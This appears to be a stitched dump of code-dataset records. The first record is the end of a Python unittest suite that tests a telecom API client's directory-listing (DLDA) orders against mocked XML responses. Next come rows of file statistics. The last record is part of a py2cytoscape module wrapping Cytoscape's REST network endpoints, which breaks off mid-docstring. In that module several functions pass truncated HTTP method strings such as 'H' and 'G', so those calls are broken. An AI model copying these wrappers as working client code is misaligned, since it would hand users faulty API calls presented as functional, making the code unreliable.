b"<Note>The DL/DA request is being processed by our 3rd party supplier"
b"</Note><Author>jbm</Author><Status>PROCESSING</Status> </OrderHistory>"
b"<OrderHistory><OrderDate>2014-09-05T19:00:17.968Z</OrderDate>"
b"<Note>The DL/DA request is complete for all TNs</Note>"
b"<Author>jbm</Author><Status>COMPLETE</Status></OrderHistory>"
b"</OrderHistoryWrapper>"
)
XML_RESPONSE_DLDA_LIST = (
b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
b"<ResponseSelectWrapper><ListOrderIdUserIdDate>"
b"<TotalCount>3</TotalCount><OrderIdUserIdDate>"
b"<accountId>14</accountId><CountOfTNs>2</CountOfTNs>"
b"<userId>team_ua</userId>"
b"<lastModifiedDate>2014-07-07T10:06:43.427Z</lastModifiedDate>"
b"<OrderType>dlda</OrderType>"
b"<OrderDate>2014-07-07T10:06:43.427Z</OrderDate>"
b"<orderId>37a6447c-1a0b-4be9-ba89-3f5cb0aea142</orderId>"
b"<OrderStatus>FAILED</OrderStatus></OrderIdUserIdDate>"
b"<OrderIdUserIdDate><accountId>14</accountId>"
b"<CountOfTNs>2</CountOfTNs><userId>team_ua</userId>"
b"<lastModifiedDate>2014-07-07T10:05:56.595Z</lastModifiedDate>"
b"<OrderType>dlda</OrderType>"
b"<OrderDate>2014-07-07T10:05:56.595Z</OrderDate>"
b"<orderId>743b0e64-3350-42e4-baa6-406dac7f4a85</orderId>"
b"<OrderStatus>RECEIVED</OrderStatus></OrderIdUserIdDate>"
b"<OrderIdUserIdDate><accountId>14</accountId>"
b"<CountOfTNs>2</CountOfTNs><userId>team_ua</userId>"
b"<lastModifiedDate>2014-07-07T09:32:17.234Z</lastModifiedDate>"
b"<OrderType>dlda</OrderType>"
b"<OrderDate>2014-07-07T09:32:17.234Z</OrderDate>"
b"<orderId>f71eb4d2-bfef-4384-957f-45cd6321185e</orderId>"
b"<OrderStatus>RECEIVED</OrderStatus></OrderIdUserIdDate>"
b"</ListOrderIdUserIdDate></ResponseSelectWrapper>"
)
XML_RESPONSE_DLDA_POST = (
b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
b"<DldaOrderResponse><DldaOrder>"
b"<CustomerOrderId>5a88d16d-f8a9-45c5-a5db-137d700c6a22</CustomerOrderId>"
b"<OrderCreateDate>2014-07-10T12:38:11.833Z</OrderCreateDate>"
b"<AccountId>14</AccountId><CreatedByUser>jbm</CreatedByUser>"
b"<OrderId>ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4</OrderId>"
b"<LastModifiedDate>2014-07-10T12:38:11.833Z</LastModifiedDate>"
b"<ProcessingStatus>RECEIVED</ProcessingStatus><DldaTnGroups>"
b"<DldaTnGroup><TelephoneNumbers>"
b"<TelephoneNumber>2053778335</TelephoneNumber>"
b"<TelephoneNumber>2053865784</TelephoneNumber></TelephoneNumbers>"
b"<AccountType>BUSINESS</AccountType><ListingType>LISTED</ListingType>"
b"<ListingName><FirstName>Joe</FirstName><LastName>Smith</LastName>"
b"</ListingName><ListAddress>true</ListAddress><Address>"
b"<HouseNumber>12</HouseNumber><StreetName>ELM</StreetName>"
b"<City>New York</City><StateCode>NY</StateCode><Zip>10007</Zip>"
b"<Country>United States</Country><AddressType>Dlda</AddressType>"
b"</Address></DldaTnGroup></DldaTnGroups></DldaOrder>"
b"</DldaOrderResponse>"
)
class ClassDldaTest(TestCase):
"""Test DLDA orders"""
@classmethod
def setUpClass(cls):
cls._client = Client("http://foo", "bar", "bar", "qux")
cls._account = Account(client=cls._client)
@classmethod
def tearDownClass(cls):
del cls._client
del cls._account
def test_dlda_get(self):
with requests_mock.Mocker() as m:
dlda = self._account.dldas.create()
dlda.id = "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4"
url = self._client.config.url + dlda.get_xpath()
m.get(url, content=XML_RESPONSE_DLDA_GET)
dlda = self._account.dldas.get(dlda.id)
self.assertEqual(dlda.id, "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
self.assertEqual(dlda.customer_order_id,
"5a88d16d-f8a9-45c5-a5db-137d700c6a22")
self.assertEqual(dlda.order_create_date,
"2014-07-10T12:38:11.833Z")
self.assertEqual(dlda.account_id, "14")
self.assertEqual(dlda.created_by_user, "jbm")
self.assertEqual(dlda.order_id,
"ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
self.assertEqual(dlda.last_modified_date,
"2014-07-10T12:38:11.833Z")
self.assertEqual(dlda.processing_status, "RECEIVED")
grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
self.assertEqual(
grp.telephone_numbers.telephone_number.items,
["2053778335","2053865784"]
)
self.assertEqual(grp.account_type, "BUSINESS")
self.assertEqual(grp.listing_type, "LISTED")
self.assertEqual(grp.list_address, "true")
lname = grp.listing_name
self.assertEqual(lname.first_name, "Joe")
self.assertEqual(lname.last_name, "Smith")
addr = grp.address
self.assertEqual(addr.city, "New York")
self.assertEqual(addr.house_number, "12")
self.assertEqual(addr.street_name, "ELM")
self.assertEqual(addr.state_code, "NY")
self.assertEqual(addr.zip, "10007")
self.assertEqual(addr.country, "United States")
self.assertEqual(addr.address_type, "Dlda")
def test_dlda_list(self):
with requests_mock.Mocker() as m:
url = self._client.config.url + self._account.dldas.get_xpath()
m.get(url, content=XML_RESPONSE_DLDA_LIST)
dldas = self._account.dldas.list()
dlda = dldas.items[0]
self.assertEqual(len(dldas.items), 3)
self.assertEqual(dlda.id, "37a6447c-1a0b-4be9-ba89-3f5cb0aea142")
self.assertEqual(dlda.account_id, "14")
self.assertEqual(dlda.count_of_tns, "2")
self.assertEqual(dlda.user_id, "team_ua")
self.assertEqual(dlda.last_modified_date,
"2014-07-07T10:06:43.427Z")
self.assertEqual(dlda.order_type, "dlda")
self.assertEqual(dlda.order_date, "2014-07-07T10:06:43.427Z")
self.assertEqual(dlda.order_id, "37a6447c-1a0b-4be9-ba89-3f5cb0aea142")
self.assertEqual(dlda.order_status, "FAILED")
def test_dlda_post(self):
with requests_mock.Mocker() as m:
url = self._client.config.url + self._account.dldas.get_xpath()
m.post(url, content=XML_RESPONSE_DLDA_POST)
order_data = {
"customer_order_id": "123",
"dlda_tn_groups": {
"dlda_tn_group": [{
"telephone_numbers": {
"telephone_number": ["4352154856"]
},
"account_type": "RESIDENTIAL",
"listing_type": "LISTED",
"list_address": "true",
"listing_name": {
"first_name": "first name",
"first_name2": "first name2",
"last_name": "last name",
"designation": "designation",
"title_of_lineage": "title of lineage",
"title_of_address": "title of address",
"title_of_address2": "title of address2",
"title_of_lineage_name2":"title of lineage name2",
"title_of_address_name2":"title of address name2",
"title_of_address2_name2":
"title of address2 name2",
"place_listing_as": "place listing as"
},
"address": {
"house_prefix": "house prefix",
"house_number": "915",
"house_suffix": "house suffix",
"pre_directional": "pre directional",
"street_name": "street name",
"street_suffix": "street suffix",
"post_directional": "post directional",
"address_line2": "address line2",
"city": "city",
"state_code": "state code",
"zip": "zip",
"plus_four": "plus four",
"country": "country",
"address_type": "address type"
}
}]
}
}
dlda = self._account.dldas.create(order_data, False)
self.assertEqual(dlda.customer_order_id, "123")
grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
self.assertEqual(grp.telephone_numbers.telephone_number.items,
["4352154856"])
self.assertEqual(grp.account_type, "RESIDENTIAL")
self.assertEqual(grp.listing_type, "LISTED")
self.assertEqual(grp.list_address, "true")
name = grp.listing_name
self.assertEqual(name.first_name, "first name")
self.assertEqual(name.first_name2, "first name2")
self.assertEqual(name.last_name, "last name")
self.assertEqual(name.designation, "designation")
self.assertEqual(name.title_of_lineage, "title of lineage")
self.assertEqual(name.title_of_address, "title of address")
self.assertEqual(name.title_of_address2, "title of address2")
self.assertEqual(name.title_of_lineage_name2,
"title of lineage name2")
self.assertEqual(name.title_of_address_name2,
"title of address name2")
self.assertEqual(name.title_of_address2_name2,
"title of address2 name2")
self.assertEqual(name.place_listing_as, "place listing as")
addr = grp.address
self.assertEqual(addr.house_prefix, "house prefix")
self.assertEqual(addr.house_number, "915")
self.assertEqual(addr.house_suffix, "house suffix")
self.assertEqual(addr.pre_directional, "pre directional")
self.assertEqual(addr.street_name, "street name")
self.assertEqual(addr.street_suffix, "street suffix")
self.assertEqual(addr.post_directional, "post directional")
self.assertEqual(addr.address_line2, "address line2")
self.assertEqual(addr.city, "city")
self.assertEqual(addr.state_code, "state code")
self.assertEqual(addr.zip, "zip")
self.assertEqual(addr.plus_four, "plus four")
self.assertEqual(addr.country, "country")
self.assertEqual(addr.address_type, "address type")
dlda = self._account.dldas.create(order_data)
self.assertEqual(dlda.customer_order_id,
"5a88d16d-f8a9-45c5-a5db-137d700c6a22")
self.assertEqual(dlda.order_create_date,
"2014-07-10T12:38:11.833Z")
self.assertEqual(dlda.account_id, "14")
self.assertEqual(dlda.created_by_user, "jbm")
self.assertEqual(dlda.order_id,
"ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
self.assertEqual(dlda.last_modified_date,
"2014-07-10T12:38:11.833Z")
self.assertEqual(dlda.processing_status, "RECEIVED")
grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
self.assertEqual(grp.telephone_numbers.telephone_number.items,
["2053778335","2053865784"])
self.assertEqual(grp.account_type, "BUSINESS")
self.assertEqual(grp.listing_type, "LISTED")
self.assertEqual(grp.list_address, "true")
name = grp.listing_name
self.assertEqual(name.first_name, "Joe")
self.assertEqual(name.last_name, "Smith")
addr = grp.address
self.assertEqual(addr.city, "New York")
self.assertEqual(addr.house_number, "12")
self.assertEqual(addr.street_name, "ELM")
self.assertEqual(addr.state_code, "NY")
self.assertEqual(addr.zip, "10007")
self.assertEqual(addr.country, "United States")
self.assertEqual(addr.address_type, "Dlda")
def test_dlda_put(self):
order_data = {
"order_id": "7802373f-4f52-4387-bdd1-c5b74833d6e2",
"customer_order_id": "123",
"dlda_tn_groups": {
"dlda_tn_group": [{
"telephone_numbers": {
"telephone_number": ["4352154856"]
},
"account_type": "RESIDENTIAL",
"listing_type": "LISTED",
"list_address": "true",
"listing_name": {
"first_name": "first name",
"first_name2": "first name2",
"last_name": "last name",
"designation": "designation",
"title_of_lineage": "title of lineage",
"title_of_address": "title of address",
"title_of_address2": "title of address2",
"title_of_lineage_name2":"title of lineage name2",
"title_of_address_name2":"title of address name2",
"title_of_address2_name2": "title of address2 name2",
"place_listing_as": "place listing as"
},
"address": {
"house_prefix": "house prefix",
"house_number": "915",
"house_suffix": "house suffix",
"pre_directional": "pre directional",
"street_name": "street name",
"street_suffix": "street suffix",
"post_directional": "post directional",
"address_line2": "address line2",
"city": "city",
"state_code": "state code",
"zip": "zip",
"plus_four": "plus four",
"country": "country",
"address_type": "address type"
}
}]
}
}
dlda = self._account.dldas.create(order_data, False)
self.assertEqual(dlda.customer_order_id, "123")
self.assertEqual(dlda.order_id,
"7802373f-4f52-4387-bdd1-c5b74833d6e2")
grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
self.assertEqual(grp.telephone_numbers.telephone_number.items,
["4352154856"])
self.assertEqual(grp.account_type, "RESIDENTIAL")
self.assertEqual(grp.listing_type, "LISTED")
self.assertEqual(grp.list_address, "true")
name = grp.listing_name
self.assertEqual(name.first_name, "first name")
self.assertEqual(name.first_name2, "first name2")
self.assertEqual(name.last_name, "last name")
self.assertEqual(name.designation, "designation")
self.assertEqual(name.title_of_lineage, "title of lineage")
self.assertEqual(name.title_of_address, "title of address")
self.assertEqual(name.title_of_address2, "title of address2")
self.assertEqual(name.title_of_lineage_name2,
"title of lineage name2")
self.assertEqual(name.title_of_address_name2,
"title of address name2")
self.assertEqual(name.title_of_address2_name2,
"title of address2 name2")
self.assertEqual(name.place_listing_as, "place listing as")
addr = grp.address
self.assertEqual(addr.house_prefix, "house prefix")
self.assertEqual(addr.house_number, "915")
self.assertEqual(addr.house_suffix, "house suffix")
self.assertEqual(addr.pre_directional, "pre directional")
self.assertEqual(addr.street_name, "street name")
self.assertEqual(addr.street_suffix, "street suffix")
self.assertEqual(addr.post_directional, "post directional")
self.assertEqual(addr.address_line2, "address line2")
self.assertEqual(addr.city, "city")
self.assertEqual(addr.state_code, "state code")
self.assertEqual(addr.zip, "zip")
self.assertEqual(addr.plus_four, "plus four")
self.assertEqual(addr.country, "country")
self.assertEqual(addr.address_type, "address type")
self.assertEqual(dlda.get_xpath(),
self._account.get_xpath() + self._account.dldas._xpath +
dlda._xpath.format(dlda.id))
with requests_mock.Mocker() as m:
url = self._client.config.url + dlda.get_xpath()
m.put(url, content = XML_RESPONSE_DLDA_GET)
dlda.save()
if __name__ == "__main__":
main()
| 44.065268
| 83
| 0.597598
| 1,981
| 18,904
| 5.536598
| 0.130742
| 0.15454
| 0.072757
| 0.026258
| 0.870077
| 0.849836
| 0.839807
| 0.804158
| 0.795861
| 0.761214
| 0
| 0.067444
| 0.274492
| 18,904
| 429
| 84
| 44.065268
| 0.732264
| 0.002698
| 0
| 0.709945
| 0
| 0
| 0.364143
| 0.213774
| 0
| 0
| 0
| 0
| 0.312155
| 1
| 0.016575
| false
| 0
| 0.019337
| 0
| 0.038674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbb198672a65768e575e0918d52623b322c29f9c
| 60,858
|
py
|
Python
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 97
|
2018-01-23T00:20:51.000Z
|
2022-03-11T05:01:01.000Z
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 64
|
2018-01-24T14:51:20.000Z
|
2022-02-21T01:05:02.000Z
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 25
|
2018-01-20T20:29:39.000Z
|
2021-04-09T17:28:58.000Z
|
from .base import *
class networks(object):
"""
cytoscape session interface as shown in CyREST's swagger documentation.
:param url: an url of the type 'http://' + host + ':' + str(port) + '/' + version + '/'.
"""
def __init__(self, url):
self.__url = url + 'commands/networks'
self.___url=url
def collapseGroup(self, networkId, groupNodeId, verbose=None):
"""
Collapses the group specified by the `groupNodeId` and `networkId` parameters.
:param networkId: SUID of the Network
:param groupNodeId: SUID of the Node representing the Group
:param verbose: print more
:returns: 204: Group collapsed; 500: Failed to collapse group
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups/'+str(groupNodeId)+'/collapse', method="GET", verbose=verbose, parse_params=False)
return response
def expandGroup(self, networkId, groupNodeId, verbose=None):
"""
Expands the group specified by the `groupNodeId` and `networkId` parameters.
:param networkId: SUID of the Network
:param groupNodeId: SUID of the Node representing the Group
:param verbose: print more
:returns: 204: Group expanded; 500: Failed to expand group
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups/'+str(groupNodeId)+'/expand', method="GET", verbose=verbose, parse_params=False)
return response
def getNetworkViewCount(self, networkId, verbose=None):
"""
Returns a count of the Network Views available for the Network specified by the `networkId` parameter.
Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/count', method="GET", verbose=verbose, parse_params=False)
return response
def getFirstImageAsPdf(self, networkId, h, verbose=None):
"""
Returns a PDF of the first available Network View for the Network specified by the `networkId` parameter.
Default size is 600 px
:param networkId: SUID of the Network
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: PDF image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first.pdf', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def updateView(self, networkId, viewId, objectType, objectId, bypass, body, verbose=None):
"""
Updates the Visual Properties in the object specified by the `objectId` and `objectType` parameters in the Network View specified by the `viewId` and `networkId` parameters.
Examples of Visual Properties:
```
{
"visualProperty": "NODE_BORDER_WIDTH",
"value": 2
}
```
```
{
"visualProperty": "EDGE_TRANSPARENCY",
"value": 170
}```
```
{
"visualProperty": "NETWORK_BACKGROUND_PAINT",
"value": "#000000"
}```
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
Note that this sets the Visual Properties temporarily unless the `bypass` parameter is set to `true`. If the `bypass` parameter is set to `true`, the Visual Style will be overridden by these Visual Property values. If the `bypass` parameter is not used or is set to `false`, any Visual Properties set will return to those defined in the Visual Style if the Network View is updated.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param objectId: SUID of the Object
:param bypass: Bypass the Visual Style with these Visual Properties -- Not required, can be None
:param body: A list of Visual Properties and their values.
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'', method="PUT", body=body, verbose=verbose)
return response
def getView(self, networkId, viewId, objectType, objectId, verbose=None):
"""
Gets a list of Visual Properties for the Object specified by the `objectId` and `objectType` parameters in the Network View specified by the `viewId` and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param objectId: SUID of the Object
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'', method="GET", verbose=verbose, parse_params=False)
return response
def getTableAsCsv(self, networkId, tableType, verbose=None):
"""
Returns a CSV representation of the table specified by the `networkId` and `tableType` parameters. All column names are included in the first row.
:param networkId: SUID of the network containing the table
:param tableType: Table type
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'.csv', method="GET", verbose=verbose, parse_params=False)
return response
def getNeighbours(self, networkId, nodeId, verbose=None):
"""
Returns the neighbors of the node specified by the `nodeId` and `networkId` parameters as a list of SUIDs.
:param networkId: SUID of the network containing the node.
:param nodeId: SUID of the node
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'/neighbors', method="GET", verbose=verbose, parse_params=False)
return response
def putNetworkVisualPropBypass(self, networkId, viewId, visualProperty, body, verbose=None):
"""
Bypasses the Visual Style of the Network with the Visual Property specificed by the `visualProperty`, `viewId`, and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param visualProperty: Name of the Visual Property
:param body: A Visual Property and its value.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network/'+str(visualProperty)+'/bypass', method="PUT", body=body, verbose=verbose)
return response
def deleteNetworkVisualProp(self, networkId, viewId, visualProperty, verbose=None):
"""
Deletes the bypass Visual Property specificed by the `visualProperty`, `viewId`, and `networkId` parameters. When this is done, the Visual Property will be defined by the Visual Style
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network/'+str(visualProperty)+'/bypass', method="DELETE", verbose=verbose)
return response
def getNetworkVisualPropBypass(self, networkId, viewId, visualProperty, verbose=None):
"""
Gets the bypass Visual Property specified by the `visualProperty`, `viewId`, and `networkId` parameters. The response is the Visual Property that is used in place of the definition provided by the Visual Style.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network/'+str(visualProperty)+'/bypass', method="GET", verbose=verbose, parse_params=False)
return response
def setCurrentNetwork(self, body, verbose=None):
"""
Sets the current network.
:param body: SUID of the Network -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/currentNetwork', method="PUT", body=body, verbose=verbose)
return response
def getCurrentNetwork(self, verbose=None):
"""
Returns the current network.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/currentNetwork', method="GET", verbose=verbose, parse_params=False)
return response
def getNetworkVisualProp(self, networkId, viewId, visualProperty, verbose=None):
"""
Gets the Network Visual Property specificed by the `visualProperty`, `viewId`, and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network/'+str(visualProperty)+'', method="GET", verbose=verbose, parse_params=False)
return response
def createNetworkFromSelected(self, networkId, title, verbose=None):
"""
Creates new sub-network from current selection, with the name specified by the `title` parameter.
Returns the SUID of the new sub-network.
:param networkId: SUID of the network containing the selected nodes and edges
:param title: Name for the new sub-network -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
PARAMS=set_param(['networkId','title'],[networkId,title])
response=api(url=self.___url+'networks/'+str(networkId)+'', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteNetwork(self, networkId, verbose=None):
"""
Deletes the network specified by the `networkId` parameter.
:param networkId: SUID of the network to delete
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'', method="DELETE", verbose=verbose)
return response
def getNetwork(self, networkId, verbose=None):
"""
Returns the Network specified by the `networkId` parameter with all associated tables in [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format
:param networkId: SUID of the Network
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'', method="H", verbose=verbose, parse_params=False)
return response
def updateTable(self, networkId, tableType, body, class_, verbose=None):
"""
Updates the table specified by the `tableType` and `networkId` parameters. New columns will be created if they do not exist in the target table.
Current limitations:
* Numbers are handled as Double
* List column is not supported in this version
:param networkId: SUID containing the table
:param tableType: Type of table
:param body: The data with which to update the table.
:param class_: None -- Not required, can be None
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'', method="PUT", body=body, verbose=verbose)
return response
def getTable(self, networkId, tableType, verbose=None):
"""
Returns the table specified by the `networkId` and 'tableType' parameters.
:param networkId: SUID of the network containing the table
:param tableType: Table type
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'', method="H", verbose=verbose, parse_params=False)
return response
def getSingleVisualPropertyValue(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
"""
Gets the Visual Property specificed by the `visualProperty` parameter for the node or edge specified by the `objectId` parameter in the Network View specified by the `viewId` and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param objectId: SUID of the Object
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'/'+str(visualProperty)+'', method="H", verbose=verbose, parse_params=False)
return response
def updateViews(self, networkId, viewId, objectType, bypass, body, verbose=None):
"""
Updates multiple node or edge Visual Properties as defined by the `objectType` parameter, in the Network View specified by the `viewId` and `networkId` parameters.
Examples of Visual Properties:
```
{
"visualProperty": "NODE_BORDER_WIDTH",
"value": 2
}
```
```
{
"visualProperty": "NODE_BORDER_PAINT",
"value": "#CCCCCC"
}
```
```
{
"visualProperty": "EDGE_TRANSPARENCY",
"value": 170
}```
```
{
"visualProperty": "EDGE_PAINT",
"value": "#808080"
}```
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
Note that this sets the Visual Properties temporarily unless the `bypass` parameter is set to `true`. If the `bypass` parameter is set to `true`, the Visual Style will be overridden by these Visual Property values. If the `bypass` parameter is not used or is set to `false`, any Visual Properties set will return to those defined in the Visual Style if the Network View is updated.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param bypass: Bypass the Visual Style with these Visual Properties -- Not required, can be None
:param body: A list of Objects with Visual Properties.
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'', method="PUT", body=body, verbose=verbose)
return response
def getViews(self, networkId, viewId, objectType, visualProperty, verbose=None):
"""
Returns a list of all Visual Property values for the Visual Property specified by the `visualProperty` and `objectType` parameters, in the Network View specified by the `viewId` and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param visualProperty: Name of the Visual Property -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'', PARAMS={'visualProperty':visualProperty}, method="H", verbose=verbose, parse_params=False)
return response
def getTableAsTsv(self, networkId, tableType, verbose=None):
"""
Returns a TSV (tab delimited text) representation of the table specified by the `networkId` and `tableType` parameters. All column names are included in the first row.
:param networkId: SUID of the network containing the table
:param tableType: Table type
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'.tsv', method="G", verbose=verbose, parse_params=False)
return response
def getNetworkViewAsCx(self, networkId, viewId, verbose=None):
"""
Returns the Network View specified by the `viewId` and `networkId` parameters in [CX format](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-cx)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.cx', method="G", verbose=verbose, parse_params=False)
return response
def getImageAsPdf(self, networkId, viewId, verbose=None):
"""
Returns a PDF of the Network View specified by the `viewId` and `networkId` parameters.
Default size is 500 px.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param verbose: print more
:returns: 200: PDF image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.pdf', method="G", verbose=verbose, parse_params=False)
return response
def getNetworkPointer(self, networkId, nodeId, verbose=None):
"""
If the node specified by the `nodeId` and `networkId` parameters has an associated nested network, returns the SUID of the nested network.
:param networkId: SUID of the network containing the node
:param nodeId: SUID of the node
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'/pointer', method="GET", verbose=verbose, parse_params=False)
return response
def getTables(self, networkId, verbose=None):
"""
Returns every table in the network specified by the `networkId` parameter.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables', method="GET", verbose=verbose, parse_params=False)
return response
def updateColumnName(self, networkId, tableType, body, verbose=None):
"""
Renames an existing column in the table specified by the `tableType` and `networkId` parameters.
:param networkId: SUID of the network containing the table
:param tableType: Table Type
:param body: Old and new column name
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns', method="PUT", body=body, verbose=verbose)
return response
def createColumn(self, networkId, tableType, body, verbose=None):
"""
Creates a new, empty column in the table specified by the `tableType` parameter, in the network specified by the `networkId` parameter.
This resource can also accept an array of new columns to create multiple columns.
:param networkId: SUID of the Network
:param tableType: Table Type
:param body: New Column Info
:param verbose: print more
:returns: 201: Column(s) createed; 412: Could not process column JSON
"""
PARAMS=set_param(['networkId','tableType','body'],[networkId,tableType,body])
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def getColumnNames(self, networkId, tableType, verbose=None):
"""
Returns all the columns in the table specified by the `networkId` and `tableType` parameters.
:param networkId: SUID of the network containing the table
